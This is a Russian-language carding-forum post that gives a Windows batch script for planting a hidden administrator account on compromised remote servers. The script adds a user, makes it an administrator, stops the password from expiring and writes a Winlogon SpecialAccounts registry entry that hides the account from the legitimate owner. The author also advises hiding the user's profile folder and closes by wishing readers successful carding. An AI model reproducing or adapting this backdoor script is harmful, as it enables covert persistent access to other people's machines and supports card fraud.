Лежа в кровати и почти наблюдая мой первый сон, где сладкие Пуэрто-Риканки играют с моим воображением, ему помешала навязчева идея, которая навернека присуща и тебе мой юный, а может быть и опытный кардклабовец навязчива идея, которая вынуждает тебя бросить все, чем бы небыл или была увлечена.
Мне вспомнилось то как последний раз попался дедик, в котором ручками пришлось создавать пользователя, а затем скрывать его, благодаря одному из наших шопов я узнал как это делается ручками и наконец то меня посетила идея развеяв мой и без того сладкий сон, нужно сделать батник, который все это сделает автоматически. Батник удобен тем что он весит очень мало, что позволяет его быстро закинуть на дедик и исполнить от имени администратора, а также то что ему не нужны не какие тяжелые библиотеки и все такое подобное.
Итак объяснять что и к чему это долго и утомительно, по этому приступим к сути, все что нам понадобится это блокнот умеющих сохранять файлы в нужной кодировке, я предоставлю вариант сразу под ру и англоязычную версию винды, за основу была взята семерка на ней и проводились тесты:
Стоит запомнить то что отличие ру и англиша всего лишь в группах пользователей и сохраняемой кодировке файла ибо если как для ру идет кодировка файла в
OEM 866, а вы сохраните под utf или ansi то ничего не будет работать ибо русские символы будут отображены не корректно и они не будут существовать, в то время как под амер машину я сохранял как
OEM-850
В коде ниже идет 3 переменных
rootpcname - Отвечает за имя машины на которой все это будет делатся, как и где смотреть думаю вы сами знаете или научитесь наконец то гуглить хоть иногда))
rootusername - Имя создаваемого пользователя
rootuserpass - Пароль пользователя
@ECHO OFF
SET rootpcname=Home-PC
SET rootusername=Qwerty888
SET rootuserpass=Club2CRD
А здесь как раз и идет добавление пользователя, пароля и назначение его админом, если админ не нужен, то стоит удалить две последних строки
net user %rootusername% %rootuserpass% /add
net localgroup Administrators %rootusername% /add
net localgroup Users %rootusername% /delete
Как видно из кода выше, мы добавляем пользователя в группу Administrators и затем удаляем из группы пользователей Users во избежание конфликтов. Второй момент отличающий группы пользователей ру от амеров в названиях групп Administrators для агнлийской винды Администраторы для ру версии, Users и Пользователи соответственно, если немного ошибся с ру названиями то сорри ибо сохраненая кодировка не поддерживается у меня на данной машине и названия корявые, но в целом нам то и не ру дедики нужны)
Ну а дальше идет анлим на пасс, незнаю зачем это но из тех обрывков пока собрал батник воедино это было решил также добавить, а также добавление записи в реестр для того что бы скрыть учетку от легита.
От себя хочу также добавить, что незабывайте скрывать папку своего пользоватея на дедике, у многих людей скрытые папки не отображаются, а нам это только на руку, но а при желании можете заглянуть себе на машину нет ли у вас чего в реестре

А если другие команды вам не о чем не говорят, значит гуглите, может откроете новый мир для себя и конечно полный исходник батника
@ECHO OFF
SET rootpcname=Home-PC
SET rootusername=Qwerty888
SET rootuserpass=Club2CRD
net user %rootusername% %rootuserpass% /add
net localgroup Administrators %rootusername% /add
net localgroup Users %rootusername% /delete
net accounts /maxpwage:unlimited
C:\Windows\System32\cmd.exe /k C:\Windows\System32\reg.exe ADD "\\%rootpcname%\HKLM\SOFTWARE\Microsoft\Window s NT\CurrentVersion\Winlogon\SpecialAccounts\UserLis t" /v %rootusername% /t REG_DWORD /d 0 /f
EXIT
Всем добра и успешного каржа
Qwerty888 специально для
Club2CRD